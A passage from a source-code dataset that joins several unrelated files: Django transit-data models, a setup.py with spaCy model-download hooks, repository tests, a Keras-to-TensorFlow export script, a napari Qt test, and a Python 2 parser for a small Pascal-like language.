    wkb_geometry = models.GeometryField(blank=True, null=True)

    class Meta:
        managed = False
        db_table = 'tm_rail_stops'


# (route, direction, stop) tuples with stop sequencing.
class TmRouteStops(models.Model):
    ogc_fid = models.AutoField(primary_key=True)
    rte = models.IntegerField(blank=True, null=True)
    dir = models.IntegerField(blank=True, null=True)
    rte_desc = models.CharField(max_length=-1, blank=True, null=True)
    dir_desc = models.CharField(max_length=-1, blank=True, null=True)
    type = models.CharField(max_length=-1, blank=True, null=True)
    stop_seq = models.IntegerField(blank=True, null=True)
    stop_id = models.IntegerField(blank=True, null=True)
    stop_name = models.CharField(max_length=-1, blank=True, null=True)
    jurisdic = models.CharField(max_length=-1, blank=True, null=True)
    zipcode = models.CharField(max_length=-1, blank=True, null=True)
    frequent = models.CharField(max_length=-1, blank=True, null=True)
    wkb_geometry = models.GeometryField(blank=True, null=True)

    class Meta:
        managed = False
        db_table = 'tm_route_stops'


# Route geometries, one row per (route, direction).
class TmRoutes(models.Model):
    ogc_fid = models.AutoField(primary_key=True)
    rte = models.IntegerField(blank=True, null=True)
    dir = models.IntegerField(blank=True, null=True)
    rte_desc = models.CharField(max_length=-1, blank=True, null=True)
    public_rte = models.CharField(max_length=-1, blank=True, null=True)
    dir_desc = models.CharField(max_length=-1, blank=True, null=True)
    frequent = models.CharField(max_length=-1, blank=True, null=True)
    type = models.CharField(max_length=-1, blank=True, null=True)
    wkb_geometry = models.GeometryField(blank=True, null=True)

    class Meta:
        managed = False
        db_table = 'tm_routes'


# Bus/rail stop points.
class TmStops(models.Model):
    ogc_fid = models.AutoField(primary_key=True)
    stop_id = models.IntegerField(blank=True, null=True)
    stop_name = models.CharField(max_length=-1, blank=True, null=True)
    jurisdic = models.CharField(max_length=-1, blank=True, null=True)
    zipcode = models.CharField(max_length=-1, blank=True, null=True)
    type = models.CharField(max_length=-1, blank=True, null=True)
    wkb_geometry = models.GeometryField(blank=True, null=True)

    class Meta:
        managed = False
        db_table = 'tm_stops'


# Transit centers.
class TmTranCen(models.Model):
    ogc_fid = models.AutoField(primary_key=True)
    name = models.CharField(max_length=-1, blank=True, null=True)
    address = models.CharField(max_length=-1, blank=True, null=True)
    city = models.CharField(max_length=-1, blank=True, null=True)
    county = models.CharField(max_length=-1, blank=True, null=True)
    zipcode = models.CharField(max_length=-1, blank=True, null=True)
    status = models.CharField(max_length=-1, blank=True, null=True)
    wkb_geometry = models.GeometryField(blank=True, null=True)

    class Meta:
        managed = False
        db_table = 'tm_tran_cen'
| 2.15625 | 2 |
setup.py | kkiran9/Affinity-model | 0 | 12761042 | <filename>setup.py
from setuptools import setup
from setuptools.command.develop import develop
from setuptools.command.install import install
from subprocess import check_call
class PostDevelopCommand(develop):
    """Post-installation for development mode."""

    def run(self):
        # Fetch the spaCy language models the package needs at runtime,
        # then finish the standard develop step.
        for spacy_model in ("en", "en_core_web_sm"):
            check_call(("python -m spacy download " + spacy_model).split())
        develop.run(self)
class PostInstallCommand(install):
    """Post-installation for installation mode."""

    def run(self):
        # Fetch the spaCy language models the package needs at runtime,
        # then finish the standard install step.
        for spacy_model in ("en", "en_core_web_sm"):
            check_call(("python -m spacy download " + spacy_model).split())
        install.run(self)
# Distribution metadata; the cmdclass hooks download the spaCy models
# right after `pip install .` / `pip install -e .`.
setup(
    name='openreview-expertise',
    version='0.1',
    description='OpenReview paper-reviewer affinity modeling',
    url='https://github.com/iesl/openreview-evidence',
    author='<NAME>, <NAME>',
    author_email='<EMAIL>, <EMAIL>',
    license='MIT',
    packages=[
        'expertise'
    ],
    install_requires=[
        'openreview-py>=1.0.1',
        'numpy',
        'pandas',
        'nltk',
        'gensim',
        'torch',
        'cloudpickle',
        'scikit-learn',
        'tqdm',
        'pytorch_pretrained_bert',
        'ipdb',
        'spacy',
        'python-Levenshtein',
        'allennlp',
        'sacremoses',
        'rank_bm25',
        'pytest'
    ],
    cmdclass={
        'develop': PostDevelopCommand,
        'install': PostInstallCommand,
    },
    zip_safe=False
)
| 1.796875 | 2 |
order/models/person.py | annaos/scc-storage-order | 0 | 12761043 | <filename>order/models/person.py<gh_stars>0
from django.contrib.auth.models import AbstractUser
from django.db import models
class Person(AbstractUser):
    """Custom user model extending Django's AbstractUser."""

    # Optional institutional affiliation.
    institute = models.CharField(max_length=100, null=True, blank=True)
    # Orders this person participates in, linked through the PersonOrder
    # join table; reverse accessors are namespaced per app/model.
    orders = models.ManyToManyField(
        'order.Order',
        through='PersonOrder',
        related_name="%(app_label)s_%(class)s_related",
        related_query_name="%(app_label)s_%(class)ss",
    )

    def __str__(self):
        return self.first_name + ' ' + self.last_name
| 2.359375 | 2 |
tests/test_repos/test_aiopg_repo.py | francojposa/aiohttp-postgres-CRUD | 5 | 12761044 | <filename>tests/test_repos/test_aiopg_repo.py<gh_stars>1-10
from typing import Optional, List
import pytest
from aiokea.errors import DuplicateResourceError, ResourceNotFoundError
from aiokea.filters import Filter, EQ, NE
from tests.stubs.user.entity import User, stub_users
async def test_get(aiopg_db, aiopg_user_repo):
# Insert a user
new_user = await aiopg_user_repo.create(
User(username="test", email="<EMAIL>")
)
# Assert we can retrieve user by its id
retrieved_user = await aiopg_user_repo.get(id=new_user.id)
assert retrieved_user == new_user
async def test_get_not_found(aiopg_db, aiopg_user_repo):
# Attempt to retrieve user by nonexistent ID
with pytest.raises(ResourceNotFoundError):
_ = await aiopg_user_repo.get(id="xxx")
async def test_where(aiopg_db, aiopg_user_repo):
# Get baseline
stub_count = len(stub_users)
# Get all user by using no filters
results: List[User] = await aiopg_user_repo.where()
assert len(results) == stub_count
# Get all user as disjoint sets by using equal to and not equal to
result_equal_to: List[User] = await aiopg_user_repo.where(
[Filter("username", EQ, "brian")]
)
result_not_equal_to: List[User] = await aiopg_user_repo.where(
[Filter("username", NE, "brian")]
)
# Assert the total equals the the sum of the two disjoint sets
assert len(result_equal_to) + len(result_not_equal_to) == stub_count
async def test_first(aiopg_db, aiopg_user_repo):
# Get baseline of all user
users: List[User] = await aiopg_user_repo.where()
# Use convenience method to get first user
first_user: User = await aiopg_user_repo.first()
# Compare first_where user with first where user
assert first_user == users[0]
async def test_first_no_results(aiopg_db, aiopg_user_repo):
# Attempt to retrieve user by nonexistent ID
user: Optional[User] = await aiopg_user_repo.first(
filters=[Filter("id", EQ, "xxx")]
)
# Assert None was returned
assert user is None
async def test_insert(aiopg_db, aiopg_user_repo):
# Get baseline
old_user_count = len(stub_users)
# Insert a user
new_user = User(username="test", email="<EMAIL>")
inserted_user = await aiopg_user_repo.create(new_user)
# Assert that the user took the id we generated within the app
assert inserted_user.id == new_user.id
# Assert we have one more user in the repo
new_user_count = len(await aiopg_user_repo.where())
assert new_user_count == old_user_count + 1
async def test_create_duplicate_error(aiopg_db, aiopg_user_repo):
# Get baseline
old_user_count = len(await aiopg_user_repo.where())
# Create a user
new_user = User(username="test", email="<EMAIL>")
await aiopg_user_repo.create(new_user)
# Attempt to re-create the same user
with pytest.raises(DuplicateResourceError):
await aiopg_user_repo.create(new_user)
# Check that only one user was created
new_user_count = len(await aiopg_user_repo.where())
assert new_user_count == old_user_count + 1
async def test_update(aiopg_db, aiopg_user_repo):
# Get an existing user
roman: User = await aiopg_user_repo.first([Filter("username", EQ, "roman")])
roman.username = "bigassforehead"
# Update the user
await aiopg_user_repo.update(roman)
# Check that the user has been updated
updated_roman: User = await aiopg_user_repo.first([Filter("id", EQ, roman.id)])
assert updated_roman.username == "bigassforehead"
async def test_delete(aiopg_db, aiopg_user_repo):
# Get baseline
old_users: List[User] = await aiopg_user_repo.where()
old_user_count = len(await aiopg_user_repo.where())
# Delete a user
first_old_user = old_users[0]
deleted_user = await aiopg_user_repo.delete(id=first_old_user.id)
# Assert that delete returned the deleted user
assert deleted_user == first_old_user
# Assert the deleted user is not available from the repo
new_users: List[User] = await aiopg_user_repo.where()
assert deleted_user not in new_users
# Assert we have one fewer user in the repo
new_user_count = len(new_users)
assert new_user_count == old_user_count - 1
async def test_delete_not_found(aiopg_db, aiopg_user_repo):
    """Deleting a nonexistent id raises ResourceNotFoundError."""
    with pytest.raises(ResourceNotFoundError):
        await aiopg_user_repo.delete(id="xxx")
| 2.390625 | 2 |
apps/pspnet/tools/export_model.py | c0710204/python-socketio-cluster | 0 | 12761045 | # target: export keras model we used as tensorflow model
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
import os
import os.path as osp
from keras import backend as K
# NOTE(review): tensorflow is imported twice; the second import is redundant.
import tensorflow as tf
# Cap GPU memory usage so the export can run alongside other jobs.
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = 0.499
sess = tf.Session(config=config)
# Hand the configured session to Keras before the model is built.
set_session(sess)
import sys
sys.path.append('.')
from apps.pspnet.pkg.pspnet import deeplearning as dpl
from apps.pspnet.pkg.pspnet.psp_tf.pspnet import PSPNet50
# Build PSPNet50 with pretrained ADE20K weights; the wrapped Keras model
# (model.model) is what gets frozen and exported below.
model=PSPNet50(
        nb_classes=150,
        input_shape=(473, 473),
        weights="pspnet50_ade20k",
        path="./pspnet/weights")
net_model=model.model
print('input is :', net_model.input.name)
print ('output is:', net_model.output.name)
# Destination file and directory for the frozen graph.
output_graph_name = 'tensor_model.pb'
output_fld = './tensorflow_model/'
def freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):
    """
    Freeze the state of a session into a pruned computation graph.

    Creates a new computation graph where variable nodes are replaced by
    constants taking their current value in the session. The new graph is
    pruned so that subgraphs not necessary to compute the requested
    outputs are removed.

    @param session The TensorFlow session to be frozen.
    @param keep_var_names A list of variable names that should not be frozen,
                          or None to freeze all the variables in the graph.
    @param output_names Names of the relevant graph outputs.
    @param clear_devices Remove the device directives from the graph for better portability.
    @return The frozen graph definition (GraphDef).
    """
    from tensorflow.python.framework.graph_util import convert_variables_to_constants
    graph = session.graph
    with graph.as_default():
        # Freeze every variable except the ones explicitly kept.
        freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))
        # Work on a copy: the original `output_names += ...` mutated the
        # caller's list in place.
        output_names = list(output_names) if output_names else []
        # Also list every variable as an output so they survive pruning
        # (preserves the original behaviour).
        output_names += [v.op.name for v in tf.global_variables()]
        input_graph_def = graph.as_graph_def()
        if clear_devices:
            # Strip device placements so the graph loads on any machine.
            for node in input_graph_def.node:
                node.device = ""
        frozen_graph = convert_variables_to_constants(session, input_graph_def,
                                                      output_names, freeze_var_names)
        return frozen_graph
# Freeze the live Keras session down to a constant GraphDef and write it out.
frozen_graph = freeze_session(K.get_session(), output_names=[net_model.output.op.name])
from tensorflow.python.framework import graph_io
# Write the frozen graph as a binary protobuf, ready for inference.
graph_io.write_graph(frozen_graph, output_fld, output_graph_name, as_text=False)
# NOTE: the original final line carried trailing dataset-metadata junk
# ("| 2.78125 | 3 |") which broke the syntax; it has been stripped.
print('saved the constant graph (ready for inference) at: ', osp.join(output_fld, output_graph_name))
napari/_qt/_tests/test_qt_utils.py | mkitti/napari | 1 | 12761046 | <filename>napari/_qt/_tests/test_qt_utils.py
from qtpy.QtCore import QObject, Signal
from ..utils import qt_signals_blocked
class Emitter(QObject):
    """Minimal QObject that emits ``test_signal`` when :meth:`go` is called."""
    test_signal = Signal()
    def go(self):
        """Emit the test signal once."""
        self.test_signal.emit()
def test_signal_blocker(qtbot):
    """qt_signals_blocked must suppress emissions inside its context."""
    emitter = Emitter()
    # Sanity check: the signal fires normally outside the blocker.
    with qtbot.waitSignal(emitter.test_signal):
        emitter.go()
    # Any emission reaching this slot while blocked is a failure.
    def on_unexpected_signal():
        raise AssertionError('a signal was emitted')
    emitter.test_signal.connect(on_unexpected_signal)
    with qt_signals_blocked(emitter):
        emitter.go()
    # Give the event loop time to deliver a (wrongly) queued emission.
    qtbot.wait(750)
| 2.1875 | 2 |
anasint.py | Kaysera/LanguageProcessorCompiler | 0 | 12761047 | <reponame>Kaysera/LanguageProcessorCompiler<gh_stars>0
#!/usr/bin/env python
import componentes
import flujo
import string
import sys
import analex
import ASTree as AST
from sys import argv
from sets import ImmutableSet
class Anasint:
    """Recursive-descent parser (Python 2) for a small Pascal-like language.

    Consumes tokens from an ``analex`` lexer, builds an AST (the list of
    instruction nodes in ``self.ast``) and a symbol table mapping
    identifier -> type in ``self.tablaSim``.  On a syntax error each method
    prints a message and skips tokens up to a synchronisation set
    (panic-mode error recovery), then returns None.
    """
    def __init__(self, lexico):
        # The whole parse runs inside the constructor.
        self.ast = []
        self.tablaSim = {}
        self.lexico = lexico
        self.avanza()
        self.analizaPrograma()
        # NOTE(review): the lookahead is cleared only after the full parse.
        self.componente = None
    def avanza(self):
        """Advance the lookahead to the next token from the lexer."""
        self.componente = self.lexico.Analiza()
    def comprueba(self, cat):
        """Consume one token of category `cat`, or report a syntax error."""
        if self.componente.cat == cat:
            self.avanza()
        else:
            print "Error: se esperaba " + cat + " en linea " + str(self.lexico.nlinea)
    def analizaPrograma(self):
        """<programa> ::= PROGRAMA id ; <decl-var> <instrucciones> ."""
        if self.componente.cat == "PR" and self.componente.valor == "PROGRAMA":
            self.avanza()
            self.comprueba("Identif")
            self.comprueba("PtoComa")
            self.analizaDeclVar()
            self.analizaInstrucciones()
            self.comprueba("Punto")
        else:
            print "Error: SE ESPERABA PR PROGRAMA en linea " + str(self.lexico.nlinea)
            while not (self.componente.cat == "EOF"):
                self.avanza()
            return
    def analizaDeclVar(self):
        """Parse the optional VAR declaration section, filling the symbol table."""
        if self.componente.cat == "PR" and self.componente.valor == "VAR":
            self.avanza()
            listaIDs = self.analizaListaId()
            self.comprueba("DosPtos")
            tipo = self.analizaTipo()
            self.comprueba("PtoComa")
            # SEMANTIC RESTRICTION: identifiers may not be redeclared
            for identif in listaIDs:
                if (identif in self.tablaSim):
                    print "Error: no puede haber identificadores repetidos. ID repetido: " + str(identif)
                else:
                    self.tablaSim[identif] = tipo
            self.analizaDeclV()
        elif self.componente.cat == "PR" and self.componente.valor =="INICIO" :
            pass
        else:
            print "Error: SE ESPERABA PR VAR O INICIO en linea " + str(self.lexico.nlinea)
            while not (self.componente.cat == "PR" and self.componente.valor == "INICIO"):
                self.avanza()
            return
    def analizaDeclV(self):
        """Parse additional declaration lines until INICIO is seen."""
        if self.componente.cat == "Identif":
            listaIDs = self.analizaListaId()
            self.comprueba("DosPtos")
            tipo = self.analizaTipo()
            self.comprueba("PtoComa")
            # SEMANTIC RESTRICTION: identifiers may not be redeclared
            for identif in listaIDs:
                if (identif in self.tablaSim):
                    print "Error: no puede haber identificadores repetidos. ID repetido: " + str(identif)
                else:
                    self.tablaSim[identif] = tipo
            self.analizaDeclV()
        elif self.componente.cat == "PR" and self.componente.valor == "INICIO":
            pass
        else:
            print "Error: SE ESPERABA IDENTIFICADOR O PR INICIO en linea " + str(self.lexico.nlinea)
            while not (self.componente.cat == "PR" and self.componente.valor == "INICIO"):
                self.avanza()
            return
    def analizaListaId(self):
        """Parse a comma-separated identifier list; returns the names as a list."""
        if self.componente.cat == "Identif":
            identif = self.componente.valor
            self.avanza()
            restoIds = self.analizaRestoListaId()
            restoIds.append(identif)
            return (restoIds)
        else:
            print "Error: SE ESPERABA IDENTIFICADOR en linea " + str(self.lexico.nlinea)
            while not (self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaRestoListaId(self):
        """Parse ", id" repetitions; returns the collected names (possibly empty)."""
        if self.componente.cat == "Coma":
            self.avanza()
            restoIDs = self.analizaListaId()
            return restoIDs
        elif self.componente.cat == "DosPtos":
            return []
        else:
            print "Error: SE ESPERABA COMA O DOS PUNTOS en linea " + str(self.lexico.nlinea)
            while not (self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaTipo(self):
        """Parse a type: a standard type or VECTOR [n] DE <std-type>."""
        if self.componente.cat =="PR"and self.componente.valor in ["ENTERO", "REAL", "BOOLEANO"]:
            tipo = self.analizaTipoStd()
            return tipo
        elif self.componente.cat == "PR" and self.componente.valor == "VECTOR":
            self.avanza()
            self.comprueba("CorAp")
            self.comprueba("Numero")
            self.comprueba("CorCi")
            if self.componente.cat == "PR" and self.componente.valor == "DE":
                self.avanza()
            else:
                print "Error: SE ESPERABA DE en linea " + str(self.lexico.nlinea)
                while not (self.componente.cat == "PtoComa"):
                    self.avanza()
                return
            # NOTE(review): the element type is parsed but discarded; only
            # the tag "VECTOR" is stored in the symbol table.
            self.analizaTipoStd()
            return "VECTOR"
        else:
            print "Error: SE ESPERABA TIPO O VECTOR en linea " + str(self.lexico.nlinea)
            while not (self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaTipoStd(self):
        """Parse a standard type keyword and return it as a string."""
        if self.componente.cat =="PR"and self.componente.valor in ["ENTERO", "REAL", "BOOLEANO"]:
            tipo = self.componente.valor
            self.avanza()
            return tipo
        else:
            print "Error: TIPO INCORRECTO"
            while not (self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaInstrucciones(self):
        """Parse INICIO <lista-inst> FIN and store the AST in self.ast."""
        if self.componente.cat == "PR" and self.componente.valor == "INICIO":
            self.avanza()
            self.ast = self.analizaListaInst()
            if self.componente.cat == "PR" and self.componente.valor == "FIN":
                self.avanza()
            else:
                print "Error: SE ESPERABA FIN en linea " + str(self.lexico.nlinea)
                while not (self.componente.cat == "Punto"):
                    self.avanza()
                return
        else:
            print "Error: SE ESPERABA INICIO en linea " + str(self.lexico.nlinea)
            while not (self.componente.cat == "Punto"):
                self.avanza()
            return
    def analizaListaInst(self):
        """Parse instructions separated by ';' and return their AST nodes."""
        if (self.componente.cat =="PR"and self.componente.valor in ["INICIO", "SI", "ESCRIBE", "LEE", "MIENTRAS"]) or self.componente.cat == "Identif":
            inst = self.analizaInstruccion()
            self.comprueba("PtoComa")
            linst = self.analizaListaInst()
            return [inst] + linst
        elif self.componente.cat == "PR" and self.componente.valor == "FIN":
            return []
        else:
            print "Error: SE ESPERABA PR, Identificador o FIN en linea " + str(self.lexico.nlinea)
            while not (self.componente.cat == "PR" and self.componente.valor == "FIN"):
                self.avanza()
            return
    def analizaInstruccion(self):
        """Parse one instruction (compound, assignment, I/O, SI or MIENTRAS)."""
        if self.componente.cat == "PR" and self.componente.valor == "INICIO":
            self.avanza()
            linst = self.analizaListaInst()
            if self.componente.cat == "PR" and self.componente.valor == "FIN":
                self.avanza()
                return AST.NodoCompuesta(linst, self.lexico.nlinea)
            else:
                while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
                    self.avanza()
                return
        elif self.componente.cat == "Identif":
            return self.analizaInstSimple()
        elif self.componente.cat =="PR"and self.componente.valor in ["LEE", "ESCRIBE"]:
            return self.analizaInstES()
        elif self.componente.cat == "PR" and self.componente.valor == "SI":
            # SI <expr> ENTONCES <inst> SINO <inst>  (the SINO arm is mandatory)
            self.avanza()
            expr = self.analizaExpresion()
            if self.componente.cat == "PR" and self.componente.valor == "ENTONCES":
                self.avanza()
            else:
                print "Error: SE ESPERABA ENTONCES en linea " + str(self.lexico.nlinea)
                while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
                    self.avanza()
                return
            instSi = self.analizaInstruccion()
            if self.componente.cat == "PR" and self.componente.valor == "SINO":
                self.avanza()
            else:
                print "Error: SE ESPERABA SINO en linea " + str(self.lexico.nlinea)
                while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
                    self.avanza()
                return
            instSino = self.analizaInstruccion()
            return AST.NodoSi(expr, instSi, instSino, self.lexico.nlinea)
        elif self.componente.cat == "PR" and self.componente.valor == "MIENTRAS":
            # MIENTRAS <expr> HACER <inst>
            self.avanza()
            expr = self.analizaExpresion()
            if self.componente.cat == "PR" and self.componente.valor == "HACER":
                self.avanza()
            else:
                print "Error: SE ESPERABA HACER en linea " + str(self.lexico.nlinea)
                while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
                    self.avanza()
                return
            inst = self.analizaInstruccion()
            return AST.NodoMientras(expr, inst, self.lexico.nlinea)
        else:
            print "Error: Instruccion invalida"
            while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaInstSimple(self):
        """Parse an assignment starting at an identifier (scalar or vector)."""
        if self.componente.cat == "Identif":
            # SEMANTIC RESTRICTION: variables must be declared before use
            if (self.componente.valor not in self.tablaSim):
                print "Error: variable no definida: '" + self.componente.valor + "' en linea " + str(self.componente.linea)
            var = self.componente
            self.avanza()
            return self.analizaRestoInstSimple(var)
        else:
            print "Error: SE ESPERABA IDENTIFICADOR en linea " + str(self.lexico.nlinea)
            while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaRestoInstSimple(self, var):
        """Finish an assignment: either ':= expr' or '[expr] := expr'."""
        if self.componente.cat == "OpAsigna":
            self.avanza()
            # NOTE(review): if `var` was undeclared, the tablaSim lookup below
            # raises KeyError after the error message — confirm intended.
            accVar = AST.NodoAccesoVariable(var.valor, self.lexico.nlinea, self.tablaSim[var.valor])
            expr = self.analizaExpresion()
            return AST.NodoAsignacion(accVar, expr, self.lexico.nlinea)
        elif self.componente.cat == "CorAp":
            self.avanza()
            exprVect = self.analizaExprSimple()
            self.comprueba("CorCi")
            self.comprueba("OpAsigna")
            expr = self.analizaExpresion()
            nodoVect = AST.NodoAccesoVector(var.valor, exprVect, self.lexico.nlinea, self.tablaSim[var.valor])
            return AST.NodoAsignacion(nodoVect, expr, self.lexico.nlinea)
        elif (self.componente.cat =="PR"and self.componente.valor in ["SINO"]) or self.componente.cat == "PtoComa":
            pass
        else:
            print "Error: SE ESPERABA OPASIGNA O CORAP en linea " + str(self.lexico.nlinea)
            while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaVariable(self):
        """Parse a variable use: plain identifier or indexed vector access."""
        if self.componente.cat == "Identif":
            # SEMANTIC RESTRICTION: variables must be declared before use
            if (self.componente.valor not in self.tablaSim):
                print "Error: variable no definida: '" + self.componente.valor + "' en linea " + str(self.componente.linea)
            var = self.componente.valor
            # NOTE(review): raises KeyError for undeclared variables right
            # after printing the error above — confirm intended.
            tipo = self.tablaSim[var]
            self.avanza()
            dcha = self.analizaRestoVar()
            if (dcha is None):
                return AST.NodoAccesoVariable(var, self.lexico.nlinea, tipo)
            else:
                # NOTE(review): unlike analizaRestoInstSimple, no `tipo` is
                # passed to NodoAccesoVector here — confirm its signature.
                return AST.NodoAccesoVector(var, dcha, self.lexico.nlinea)
        else:
            print "Error: SE ESPERABA IDENTIFICADOR en linea " + str(self.lexico.nlinea)
            while not ((self.componente.cat == "PR" and self.componente.valor in ["Y","O", "ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "OpAdd" or self.componente.cat == "OpMult" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaRestoVar(self):
        """Parse an optional '[expr]' index; returns the index AST or None."""
        if self.componente.cat == "CorAp":
            self.avanza()
            expr = self.analizaExprSimple()
            self.comprueba("CorCi")
            return expr
        elif (self.componente.cat =="PR"and self.componente.valor in ["Y", "O", "ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpMult" or self.componente.cat == "OpAdd" or self.componente.cat == "OpRel" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa" or self.componente.cat == "CorCi":
            return None
        else:
            print "Error: SE ESPERABA CORAP en linea " + str(self.lexico.nlinea)
            # NOTE(review): "ENTERO" in the sync set below is likely a typo
            # for "ENTONCES" (compare the follow set two branches above).
            while not ((self.componente.cat == "PR" and self.componente.valor in ["Y","O", "ENTERO", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "OpAdd" or self.componente.cat == "OpMult" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaInstES(self):
        """Parse an I/O instruction: LEE(id) or ESCRIBE(expr)."""
        if self.componente.cat == "PR" and self.componente.valor == "LEE":
            self.avanza()
            self.comprueba("ParentAp")
            # SEMANTIC RESTRICTION: LEE's argument may only be integer or real
            if (self.tablaSim[self.componente.valor] not in ["ENTERO", "REAL"]):
                print "Error: el tipo a leer solo puede ser entero o real (instruccion LEE en linea " + str(self.componente.linea) + ")"
            var = self.componente.valor
            tipo = self.tablaSim[var]
            nodoVar = AST.NodoAccesoVariable(var, self.lexico.nlinea, tipo)
            nodoLee = AST.NodoLee(nodoVar, self.lexico.nlinea)
            self.comprueba("Identif")
            self.comprueba("ParentCi")
            return nodoLee
        elif self.componente.cat == "PR" and self.componente.valor == "ESCRIBE":
            self.avanza()
            self.comprueba("ParentAp")
            expr = self.analizaExprSimple()
            self.comprueba("ParentCi")
            nodoEscribe = AST.NodoEscribe(expr, self.lexico.nlinea)
            return nodoEscribe
        else:
            print "Error: SE ESPERABA LEE O ESCRIBE en linea " + str(self.lexico.nlinea)
            while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaExpresion(self):
        """Parse <expr-simple> optionally followed by a relational operator."""
        if (self.componente.cat =="PR"and self.componente.valor in ["NO", "CIERTO", "FALSO"]) or self.componente.cat == "Identif" or self.componente.cat == "Numero" or self.componente.cat == "ParentAp" or self.componente.cat == "OpAdd":
            izd = self.analizaExprSimple()
            dcha = self.analizaExpresionPrima()
            if dcha is None:
                return izd
            else:
                nodoComp = AST.NodoComparacion(izd, dcha[0], self.lexico.nlinea, dcha[1])
                return nodoComp
        else:
            print "Error: SE ESPERABA Comienzo de Expresion Simple en linea " + str(self.lexico.nlinea)
            while not ((self.componente.cat == "PR" and self.componente.valor in ["ENTONCES","HACER", "SINO"]) or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaExpresionPrima(self):
        """Parse an optional 'OpRel expr-simple' tail; returns [ast, op] or None."""
        if (self.componente.cat =="PR"and self.componente.valor in ["ENTONCES", "HACER", "SINO"]) or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa" :
            return None
        elif self.componente.cat == "OpRel":
            op = self.componente.valor
            self.avanza()
            arb = self.analizaExprSimple()
            return [arb, op]
        else:
            print "Error: SE ESPERABA Comienzo de Expresion Simple en linea " + str(self.lexico.nlinea)
            while not ((self.componente.cat == "PR" and self.componente.valor in ["ENTONCES","HACER", "SINO"]) or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaExprSimple(self):
        """Parse an additive expression, with an optional leading sign."""
        if (self.componente.cat =="PR"and self.componente.valor in ["NO", "CIERTO", "FALSO"]) or self.componente.cat == "ParentAp" or self.componente.cat == "Identif" or self.componente.cat == "Numero":
            term = self.analizaTermino()
            return self.analizaRestoExprSimple(term)
        elif self.componente.cat == "OpAdd":
            # Unary sign: encoded as an arithmetic node with a None left child.
            signo = self.componente.valor
            self.analizaSigno()
            term = self.analizaTermino()
            dcha = self.analizaRestoExprSimple(term)
            return AST.NodoAritmetico(None, dcha, self.lexico.nlinea, signo)
        else:
            print "Error: SE ESPERABA Comienzo de Expresion Simple en linea " + str(self.lexico.nlinea)
            while not ((self.componente.cat == "PR" and self.componente.valor in ["ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaRestoExprSimple(self, hered):
        """Left-associative '+/-' and 'O' chain; `hered` is the inherited left AST."""
        if self.componente.cat == "OpAdd":
            op = self.componente.valor
            self.avanza()
            term = self.analizaTermino()
            nodoSuma = AST.NodoAritmetico(hered, term, self.lexico.nlinea, op)
            return self.analizaRestoExprSimple(nodoSuma)
        elif self.componente.cat == "PR" and self.componente.valor == "O":
            self.avanza()
            term = self.analizaTermino()
            nodoCuasiSuma = AST.NodoAritmetico(hered, term, self.lexico.nlinea, "O")
            return self.analizaRestoExprSimple(nodoCuasiSuma)
        elif (self.componente.cat =="PR"and self.componente.valor in ["ENTONCES", "HACER", "SINO"]) or self.componente.cat == "ParentCi" or self.componente.cat == "CorCi" or self.componente.cat == "OpRel" or self.componente.cat == "PtoComa":
            return hered
        else:
            print "Error: SE ESPERABA Comienzo de Resto Expresion Simple en linea " + str(self.lexico.nlinea)
            while not ((self.componente.cat == "PR" and self.componente.valor in ["ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaTermino(self):
        """Parse a multiplicative term."""
        if (self.componente.cat =="PR"and self.componente.valor in ["NO", "CIERTO", "FALSO"]) or self.componente.cat == "ParentAp" or self.componente.cat == "Identif" or self.componente.cat == "Numero":
            izq = self.analizaFactor()
            return self.analizaRestoTerm(izq)
        else:
            print "Error: SE ESPERABA Termino en linea " + str(self.lexico.nlinea)
            while not ((self.componente.cat == "PR" and self.componente.valor in ["O", "ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "OpAdd" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaRestoTerm(self, hered):
        """Left-associative '*/' and 'Y' chain; `hered` is the inherited left AST."""
        if self.componente.cat == "OpMult":
            op = self.componente.valor
            self.avanza()
            fact = self.analizaFactor()
            nodoMult = AST.NodoAritmetico(hered, fact, self.lexico.nlinea, op)
            return self.analizaRestoTerm(nodoMult)
        elif self.componente.cat == "PR" and self.componente.valor == "Y":
            self.avanza()
